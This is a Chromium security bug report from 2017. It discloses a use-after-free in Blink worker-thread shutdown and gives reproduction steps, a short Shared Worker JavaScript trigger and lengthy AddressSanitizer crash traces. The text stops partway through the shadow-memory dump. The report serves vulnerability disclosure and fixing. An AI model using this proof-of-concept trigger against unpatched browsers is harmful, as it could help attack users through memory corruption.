Security: Web Worker - Use After Free in in blink::CrossThreadPersistentRegion::PrepareForThreadStateTermination()
Reported by
loobeny...@gmail.com,
Nov 13 2017
|
|||||||||
Issue descriptionVULNERABILITY DETAILS Steps to reproduce: 1. Run server side script UAF_PrepareForThreadStateTermination_Repro.js in Node.js (node UAF_PrepareForThreadStateTermination_Repro.js ). 2. Enter http://localhost:12345 in Chrome browser ASAN build. 3.ASAN reports a Use After Free in in blink::CrossThreadPersistentRegion::PrepareForThreadStateTermination. ==5652==ERROR: AddressSanitizer: heap-use-after-free on address 0x0bbc1008 at pc 0x12f6a3cd bp 0x238fe3dc sp 0x238fe3d0 READ of size 4 at 0x0bbc1008 thread T18 #0 0x12f6a3cc in blink::CrossThreadPersistentRegion::PrepareForThreadStateTermination C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\heap\PersistentNode.cpp:175 VERSION Chrome Version: Chromium Chromium 64.0.3262.0 (Developer Build) (32-bit) ( https://www.googleapis.com/download/storage/v1/b/chromium-browser-asan/o/win32-release%2Fasan-win32-release-514498.zip?generation=1510142515729758&alt=media ) Operating System: Windows 10 REPRODUCTION CASE (full server code in UAF_PrepareForThreadStateTermination_Repro.js) Shared Worker code: onconnect = function (e) {fetch("./nonexist.jpg").then(function(res) {res.blob().then(function(blob) {createImageBitmap(blob, 0, 0, 63, 82).then(function(value) {}).catch(function(error) {});}).catch(function(error) {});close();}).catch(function(error) {});}; FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION Type of crash: tab Crash State: ================================================================= ==5652==ERROR: AddressSanitizer: heap-use-after-free on address 0x0bbc1008 at pc 0x12f6a3cd bp 0x238fe3dc sp 0x238fe3d0 READ of size 4 at 0x0bbc1008 thread T18 #0 0x12f6a3cc in blink::CrossThreadPersistentRegion::PrepareForThreadStateTermination C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\heap\PersistentNode.cpp:175 #1 0x12f6c6c8 in blink::ThreadState::RunTerminationGC C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\heap\ThreadState.cpp:173 #2 0x12f6c5d2 in blink::ThreadState::DetachCurrentThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\heap\ThreadState.cpp:159 #3 0x17faa6a5 in blink::WorkerBackingThread::ShutdownOnBackingThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerBackingThread.cpp:126 #4 0x17fa04fd in blink::WorkerThread::PerformShutdownOnWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerThread.cpp:482 #5 0x16abe223 in blink::`anonymous namespace'::RunCrossThreadClosure C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebTaskRunner.cpp:34 #6 0x189fbe27 in base::internal::FunctorTraits<void (*)(base::RepeatingCallback<void (const media::AudioParameters &, std::unique_ptr<std::basic_string<char,std::char_traits<char>,std::allocator<char> >,std::default_delete<std::basic_string<char,std::char_traits<char>,std::allocator<char> > > >, base::TimeTicks)>),void>::Invoke<base::RepeatingCallback<void (const media::AudioParameters &, std::unique_ptr<std::basic_string<char,std::char_traits<char>,std::allocator<char> >,std::default_delete<std::basic_string<char,std::char_traits<char>,std::allocator<char> > > >, base::TimeTicks)> > C:\b\c\b\win_asan_release\src\base\bind_internal.h:149 #7 0x189fbdef in base::internal::Invoker<base::internal::BindState<void (*)(base::RepeatingCallback<void (const media::AudioParameters &, std::unique_ptr<std::basic_string<char,std::char_traits<char>,std::allocator<char> >,std::default_delete<std::basic_string<char,std::char_traits<char>,std::allocator<char> > > >, base::TimeTicks)>),base::RepeatingCallback<void (const media::AudioParameters &, std::unique_ptr<std::basic_string<char,std::char_traits<char>,std::allocator<char> >,std::default_delete<std::basic_string<char,std::char_traits<char>,std::allocator<char> > > >, base::TimeTicks)> >,void ()>::RunOnce C:\b\c\b\win_asan_release\src\base\bind_internal.h:319 #8 0x137944dc in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:55 #9 0x13071822 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:568 #10 0x1306b63a in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:356 #11 0x188d5b5e in base::internal::Invoker<base::internal::BindState<void (content::WebMediaPlayerMS::*)(bool) __attribute__((thiscall)),base::WeakPtr<content::WebMediaPlayerMS>,bool>,void ()>::RunOnce C:\b\c\b\win_asan_release\src\base\bind_internal.h:319 #12 0x137944dc in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:55 #13 0x137fe242 in base::internal::IncomingTaskQueue::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\incoming_task_queue.cc:130 #14 0x1366d795 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:394 #15 0x1366e966 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:406 #16 0x1366ee02 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:450 #17 0x13808d93 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:37 #18 0x1366c9a3 in base::MessageLoop::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:345 #19 0x13646e10 in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:114 #20 0x13697f5a in base::Thread::Run C:\b\c\b\win_asan_release\src\base\threading\thread.cc:255 #21 0x13698394 in base::Thread::ThreadMain C:\b\c\b\win_asan_release\src\base\threading\thread.cc:338 #22 0x13679cc9 in base::`anonymous namespace'::ThreadFunc C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:89 #23 0x1086ad1 in __asan::AsanThread::ThreadStart c:\b\rr\tmpgjfswy\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_thread.cc:259 #24 0x108588d in asan_thread_start c:\b\rr\tmpgjfswy\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_win.cc:136 #25 0x748e8743 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x18743) #26 0x77bf582c in RtlGetAppContainerNamedObjectPath+0xfc (C:\WINDOWS\SYSTEM32\ntdll.dll+0x6582c) #27 0x77bf57fc in RtlGetAppContainerNamedObjectPath+0xcc (C:\WINDOWS\SYSTEM32\ntdll.dll+0x657fc) 0x0bbc1008 is located 11784 bytes inside of 16452-byte region [0x0bbbe200,0x0bbc2244) freed by thread T17 here: #0 0x108cc28 in free c:\b\rr\tmpgjfswy\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:44 #1 0x12b53c8c in v8::internal::AccountingAllocator::ReturnSegment C:\b\c\b\win_asan_release\src\v8\src\zone\accounting-allocator.cc:109 #2 0x12b54151 in v8::internal::Zone::~Zone C:\b\c\b\win_asan_release\src\v8\src\zone\zone.cc:58 #3 0x122ab646 in v8::internal::ParseInfo::~ParseInfo C:\b\c\b\win_asan_release\src\v8\src\parsing\parse-info.cc:104 #4 0x11370e4e in v8::internal::Compiler::Compile C:\b\c\b\win_asan_release\src\v8\src\compiler.cc:936 #5 0x11372919 in v8::internal::Compiler::Compile C:\b\c\b\win_asan_release\src\v8\src\compiler.cc:950 #6 0x125ffed9 in v8::internal::Runtime_CompileLazy C:\b\c\b\win_asan_release\src\v8\src\runtime\runtime-compiler.cc:21 previously allocated by thread T17 here: #0 0x108cd0c in malloc c:\b\rr\tmpgjfswy\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_malloc_win.cc:60 #1 0x12b538a1 in v8::internal::AccountingAllocator::GetSegment C:\b\c\b\win_asan_release\src\v8\src\zone\accounting-allocator.cc:72 #2 0x12b54570 in v8::internal::Zone::NewExpand C:\b\c\b\win_asan_release\src\v8\src\zone\zone.cc:160 #3 0x12b543ce in v8::internal::Zone::New C:\b\c\b\win_asan_release\src\v8\src\zone\zone.cc:79 #4 0x110f62fa in v8::internal::AstValueFactory::GetString C:\b\c\b\win_asan_release\src\v8\src\ast\ast-value-factory.cc:283 #5 0x110f6041 in v8::internal::AstValueFactory::GetOneByteStringInternal C:\b\c\b\win_asan_release\src\v8\src\ast\ast-value-factory.cc:209 #6 0x1246d386 in v8::internal::Scanner::CurrentSymbol C:\b\c\b\win_asan_release\src\v8\src\parsing\scanner.cc:1780 #7 0x122ce1e8 in v8::internal::ParserBase<v8::internal::Parser>::ParseIdentifierName C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:1731 #8 0x12359aec in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpressionContinuation C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3673 #9 0x1235b6f9 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3542 #10 0x12353184 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3460 #11 0x12353211 in v8::internal::ParserBase<v8::internal::Parser>::ParseMemberWithNewPrefixesExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3439 #12 0x12349491 in v8::internal::ParserBase<v8::internal::Parser>::ParseLeftHandSideExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3257 #13 0x1239e599 in v8::internal::ParserBase<v8::internal::Parser>::ParsePostfixExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3227 #14 0x1239b6d1 in v8::internal::ParserBase<v8::internal::Parser>::ParseUnaryExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3216 #15 0x12399769 in v8::internal::ParserBase<v8::internal::Parser>::ParseBinaryExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3088 #16 0x12395a41 in v8::internal::ParserBase<v8::internal::Parser>::ParseConditionalExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:3050 #17 0x122d653b in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:2826 #18 0x122d8076 in v8::internal::ParserBase<v8::internal::Parser>::ParseAssignmentExpression C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:2941 #19 0x1232c4b2 in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionCoverGrammar C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:1965 #20 0x1237e0eb in v8::internal::ParserBase<v8::internal::Parser>::ParseExpressionOrLabelledStatement C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:5108 #21 0x12361d8a in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:5008 #22 0x122cbf6a in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementListItem C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:4908 #23 0x1235f2a8 in v8::internal::ParserBase<v8::internal::Parser>::ParseBlock C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:5029 #24 0x12361e15 in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:4940 #25 0x123801d4 in v8::internal::ParserBase<v8::internal::Parser>::ParseScopedStatement C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:5055 #26 0x12363c9f in v8::internal::ParserBase<v8::internal::Parser>::ParseIfStatement C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:5197 #27 0x123625c2 in v8::internal::ParserBase<v8::internal::Parser>::ParseStatement C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:4945 #28 0x122cbf6a in v8::internal::ParserBase<v8::internal::Parser>::ParseStatementListItem C:\b\c\b\win_asan_release\src\v8\src\parsing\parser-base.h:4908 Thread T18 created by T0 here: #0 0x1085992 in __asan_wrap_CreateThread c:\b\rr\tmpgjfswy\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_win.cc:146 #1 0x13679507 in base::`anonymous namespace'::CreateThreadInternal C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:128 #2 0x136793e3 in base::PlatformThread::CreateWithPriority C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:207 #3 0x13697629 in base::Thread::StartWithOptions C:\b\c\b\win_asan_release\src\base\threading\thread.cc:112 #4 0x130a4325 in blink::scheduler::WebThreadImplForWorkerScheduler::WebThreadImplForWorkerScheduler C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_impl_for_worker_scheduler.cc:31 #5 0x130a0a20 in std::make_unique<blink::scheduler::WebThreadImplForWorkerScheduler,const char *&,base::Thread::Options &,void> c:\b\c\win_toolchain\vs_files\a9e1098bba66d2acccc377d5ee81265910f29272\vc\tools\msvc\14.11.25503\include\memory:2438 #6 0x130a0821 in blink::scheduler::WebThreadBase::CreateWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_base.cc:134 #7 0x16a085e3 in content::BlinkPlatformImpl::CreateThread C:\b\c\b\win_asan_release\src\content\child\blink_platform_impl.cc:353 #8 0x1b4a1e49 in blink::WebThreadSupportingGC::WebThreadSupportingGC C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:38 #9 0x1b4a1d02 in blink::WebThreadSupportingGC::Create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:18 #10 0x17fa9af0 in blink::WorkerBackingThread::WorkerBackingThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerBackingThread.cpp:61 #11 0x1c195e07 in blink::SharedWorkerThread::SharedWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\SharedWorkerThread.cpp:48 #12 0x1bc8c23b in blink::WebSharedWorkerImpl::OnScriptLoaderFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\exported\WebSharedWorkerImpl.cpp:340 #13 0x1c19207b in blink::WorkerScriptLoader::NotifyFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerScriptLoader.cpp:238 #14 0x1c193b02 in blink::WorkerScriptLoader::DidFinishLoading C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerScriptLoader.cpp:201 #15 0x1c0a1fe1 in blink::DocumentThreadableLoader::HandleSuccessfulFinish C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\loader\DocumentThreadableLoader.cpp:1076 #16 0x1c09f45e in blink::DocumentThreadableLoader::NotifyFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\loader\DocumentThreadableLoader.cpp:1057 #17 0x12fbc69a in blink::Resource::NotifyFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\Resource.cpp:360 #18 0x12fbe71c in blink::Resource::Finish C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\Resource.cpp:447 #19 0x12fe0ca6 in blink::ResourceFetcher::HandleLoaderFinish C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\ResourceFetcher.cpp:1382 #20 0x13003999 in blink::ResourceLoader::DidFinishLoading C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\ResourceLoader.cpp:650 #21 0x1867c2cc in content::WebURLLoaderImpl::Context::OnCompletedRequest C:\b\c\b\win_asan_release\src\content\renderer\loader\web_url_loader_impl.cc:938 #22 0x187d523b in content::ResourceDispatcher::OnRequestComplete C:\b\c\b\win_asan_release\src\content\renderer\loader\resource_dispatcher.cc:375 #23 0x18bdaf11 in content::URLResponseBodyConsumer::NotifyCompletionIfAppropriate C:\b\c\b\win_asan_release\src\content\renderer\loader\url_response_body_consumer.cc:174 #24 0x18bda9e0 in content::URLResponseBodyConsumer::OnReadable C:\b\c\b\win_asan_release\src\content\renderer\loader\url_response_body_consumer.cc:132 #25 0x18bdb409 in base::internal::Invoker<base::internal::BindState<void (content::URLResponseBodyConsumer::*)(unsigned int) __attribute__((thiscall)),base::internal::UnretainedWrapper<content::URLResponseBodyConsumer> >,void (unsigned int)>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:331 #26 0x10b4fa53 in mojo::SimpleWatcher::DiscardReadyState C:\b\c\b\win_asan_release\src\mojo\public\cpp\system\simple_watcher.h:192 #27 0x10b4fb29 in base::internal::Invoker<base::internal::BindState<void (*)(const base::RepeatingCallback<void (unsigned int)> &, unsigned int, const mojo::HandleSignalsState &),base::RepeatingCallback<void (unsigned int)> >,void (unsigned int, const mojo::HandleSignalsState &)>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:331 #28 0x138dd0aa in mojo::SimpleWatcher::OnHandleReady C:\b\c\b\win_asan_release\src\mojo\public\cpp\system\simple_watcher.cc:275 #29 0x138ddd01 in base::internal::Invoker<base::internal::BindState<void (mojo::SimpleWatcher::*)(int, unsigned int, const mojo::HandleSignalsState &) __attribute__((thiscall)),base::WeakPtr<mojo::SimpleWatcher>,int,unsigned int,mojo::HandleSignalsState>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:331 #30 0x137944dc in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:55 #31 0x13071822 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:568 #32 0x1306b63a in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:356 #33 0x188d5b5e in base::internal::Invoker<base::internal::BindState<void (content::WebMediaPlayerMS::*)(bool) __attribute__((thiscall)),base::WeakPtr<content::WebMediaPlayerMS>,bool>,void ()>::RunOnce C:\b\c\b\win_asan_release\src\base\bind_internal.h:319 #34 0x137944dc in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:55 #35 0x137fe242 in base::internal::IncomingTaskQueue::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\incoming_task_queue.cc:130 #36 0x1366d795 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:394 #37 0x1366e966 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:406 #38 0x1366ee02 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:450 #39 0x13808d93 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:37 #40 0x1366c9a3 in base::MessageLoop::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:345 #41 0x13646e10 in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:114 #42 0x184f2e8b in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:222 #43 0x1357c7e4 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:427 #44 0x1357dc69 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:705 #45 0x135919b4 in service_manager::Main C:\b\c\b\win_asan_release\src\services\service_manager\embedder\main.cc:456 #46 0x1357c4c6 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:19 #47 0xfd61285 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:125 #48 0xd28066 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:199 #49 0xd21a54 in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:230 #50 0x10a0199 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:283 #51 0x748e8743 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x18743) #52 0x77bf582c in RtlGetAppContainerNamedObjectPath+0xfc (C:\WINDOWS\SYSTEM32\ntdll.dll+0x6582c) #53 0x77bf57fc in RtlGetAppContainerNamedObjectPath+0xcc (C:\WINDOWS\SYSTEM32\ntdll.dll+0x657fc) Thread T17 created by T0 here: #0 0x1085992 in __asan_wrap_CreateThread c:\b\rr\tmpgjfswy\w\src\third_party\llvm\projects\compiler-rt\lib\asan\asan_win.cc:146 #1 0x13679507 in base::`anonymous namespace'::CreateThreadInternal C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:128 #2 0x136793e3 in base::PlatformThread::CreateWithPriority C:\b\c\b\win_asan_release\src\base\threading\platform_thread_win.cc:207 #3 0x13697629 in base::Thread::StartWithOptions C:\b\c\b\win_asan_release\src\base\threading\thread.cc:112 #4 0x130a4325 in blink::scheduler::WebThreadImplForWorkerScheduler::WebThreadImplForWorkerScheduler C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_impl_for_worker_scheduler.cc:31 #5 0x130a0a20 in std::make_unique<blink::scheduler::WebThreadImplForWorkerScheduler,const char *&,base::Thread::Options &,void> c:\b\c\win_toolchain\vs_files\a9e1098bba66d2acccc377d5ee81265910f29272\vc\tools\msvc\14.11.25503\include\memory:2438 #6 0x130a0821 in blink::scheduler::WebThreadBase::CreateWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\child\webthread_base.cc:134 #7 0x16a085e3 in content::BlinkPlatformImpl::CreateThread C:\b\c\b\win_asan_release\src\content\child\blink_platform_impl.cc:353 #8 0x1b4a1e49 in blink::WebThreadSupportingGC::WebThreadSupportingGC C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:38 #9 0x1b4a1d02 in blink::WebThreadSupportingGC::Create C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\WebThreadSupportingGC.cpp:18 #10 0x17fa9af0 in blink::WorkerBackingThread::WorkerBackingThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerBackingThread.cpp:61 #11 0x1c195e07 in blink::SharedWorkerThread::SharedWorkerThread C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\SharedWorkerThread.cpp:48 #12 0x1bc8c23b in blink::WebSharedWorkerImpl::OnScriptLoaderFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\exported\WebSharedWorkerImpl.cpp:340 #13 0x1c19207b in blink::WorkerScriptLoader::NotifyFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerScriptLoader.cpp:238 #14 0x1c193b02 in blink::WorkerScriptLoader::DidFinishLoading C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\workers\WorkerScriptLoader.cpp:201 #15 0x1c0a1fe1 in blink::DocumentThreadableLoader::HandleSuccessfulFinish C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\loader\DocumentThreadableLoader.cpp:1076 #16 0x1c09f45e in blink::DocumentThreadableLoader::NotifyFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\core\loader\DocumentThreadableLoader.cpp:1057 #17 0x12fbc69a in blink::Resource::NotifyFinished C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\Resource.cpp:360 #18 0x12fbe71c in blink::Resource::Finish C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\Resource.cpp:447 #19 0x12fe0ca6 in blink::ResourceFetcher::HandleLoaderFinish C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\ResourceFetcher.cpp:1382 #20 0x13003999 in blink::ResourceLoader::DidFinishLoading C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\loader\fetch\ResourceLoader.cpp:650 #21 0x1867c2cc in content::WebURLLoaderImpl::Context::OnCompletedRequest C:\b\c\b\win_asan_release\src\content\renderer\loader\web_url_loader_impl.cc:938 #22 0x187d523b in content::ResourceDispatcher::OnRequestComplete C:\b\c\b\win_asan_release\src\content\renderer\loader\resource_dispatcher.cc:375 #23 0x18bdaf11 in content::URLResponseBodyConsumer::NotifyCompletionIfAppropriate C:\b\c\b\win_asan_release\src\content\renderer\loader\url_response_body_consumer.cc:174 #24 0x18bda9e0 in content::URLResponseBodyConsumer::OnReadable C:\b\c\b\win_asan_release\src\content\renderer\loader\url_response_body_consumer.cc:132 #25 0x18bdb409 in base::internal::Invoker<base::internal::BindState<void (content::URLResponseBodyConsumer::*)(unsigned int) __attribute__((thiscall)),base::internal::UnretainedWrapper<content::URLResponseBodyConsumer> >,void (unsigned int)>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:331 #26 0x10b4fa53 in mojo::SimpleWatcher::DiscardReadyState C:\b\c\b\win_asan_release\src\mojo\public\cpp\system\simple_watcher.h:192 #27 0x10b4fb29 in base::internal::Invoker<base::internal::BindState<void (*)(const base::RepeatingCallback<void (unsigned int)> &, unsigned int, const mojo::HandleSignalsState &),base::RepeatingCallback<void (unsigned int)> >,void (unsigned int, const mojo::HandleSignalsState &)>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:331 #28 0x138dd0aa in mojo::SimpleWatcher::OnHandleReady C:\b\c\b\win_asan_release\src\mojo\public\cpp\system\simple_watcher.cc:275 #29 0x138ddd01 in base::internal::Invoker<base::internal::BindState<void (mojo::SimpleWatcher::*)(int, unsigned int, const mojo::HandleSignalsState &) __attribute__((thiscall)),base::WeakPtr<mojo::SimpleWatcher>,int,unsigned int,mojo::HandleSignalsState>,void ()>::Run C:\b\c\b\win_asan_release\src\base\bind_internal.h:331 #30 0x137944dc in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:55 #31 0x13071822 in blink::scheduler::TaskQueueManager::ProcessTaskFromWorkQueue C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:568 #32 0x1306b63a in blink::scheduler::TaskQueueManager::DoWork C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\scheduler\base\task_queue_manager.cc:356 #33 0x188d5b5e in base::internal::Invoker<base::internal::BindState<void (content::WebMediaPlayerMS::*)(bool) __attribute__((thiscall)),base::WeakPtr<content::WebMediaPlayerMS>,bool>,void ()>::RunOnce C:\b\c\b\win_asan_release\src\base\bind_internal.h:319 #34 0x137944dc in base::debug::TaskAnnotator::RunTask C:\b\c\b\win_asan_release\src\base\debug\task_annotator.cc:55 #35 0x137fe242 in base::internal::IncomingTaskQueue::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\incoming_task_queue.cc:130 #36 0x1366d795 in base::MessageLoop::RunTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:394 #37 0x1366e966 in base::MessageLoop::DeferOrRunPendingTask C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:406 #38 0x1366ee02 in base::MessageLoop::DoWork C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:450 #39 0x13808d93 in base::MessagePumpDefault::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_pump_default.cc:37 #40 0x1366c9a3 in base::MessageLoop::Run C:\b\c\b\win_asan_release\src\base\message_loop\message_loop.cc:345 #41 0x13646e10 in base::RunLoop::Run C:\b\c\b\win_asan_release\src\base\run_loop.cc:114 #42 0x184f2e8b in content::RendererMain C:\b\c\b\win_asan_release\src\content\renderer\renderer_main.cc:222 #43 0x1357c7e4 in content::RunNamedProcessTypeMain C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:427 #44 0x1357dc69 in content::ContentMainRunnerImpl::Run C:\b\c\b\win_asan_release\src\content\app\content_main_runner.cc:705 #45 0x135919b4 in service_manager::Main C:\b\c\b\win_asan_release\src\services\service_manager\embedder\main.cc:456 #46 0x1357c4c6 in content::ContentMain C:\b\c\b\win_asan_release\src\content\app\content_main.cc:19 #47 0xfd61285 in ChromeMain C:\b\c\b\win_asan_release\src\chrome\app\chrome_main.cc:125 #48 0xd28066 in MainDllLoader::Launch C:\b\c\b\win_asan_release\src\chrome\app\main_dll_loader_win.cc:199 #49 0xd21a54 in main C:\b\c\b\win_asan_release\src\chrome\app\chrome_exe_main_win.cc:230 #50 0x10a0199 in __scrt_common_main_seh f:\dd\vctools\crt\vcstartup\src\startup\exe_common.inl:283 #51 0x748e8743 in BaseThreadInitThunk+0x23 (C:\WINDOWS\System32\KERNEL32.DLL+0x18743) #52 0x77bf582c in RtlGetAppContainerNamedObjectPath+0xfc (C:\WINDOWS\SYSTEM32\ntdll.dll+0x6582c) #53 0x77bf57fc in RtlGetAppContainerNamedObjectPath+0xcc (C:\WINDOWS\SYSTEM32\ntdll.dll+0x657fc) SUMMARY: AddressSanitizer: heap-use-after-free C:\b\c\b\win_asan_release\src\third_party\WebKit\Source\platform\heap\PersistentNode.cpp:175 in blink::CrossThreadPersistentRegion::PrepareForThreadStateTermination Shadow bytes around the buggy address: 0x317781b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x317781c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x317781d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x317781e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 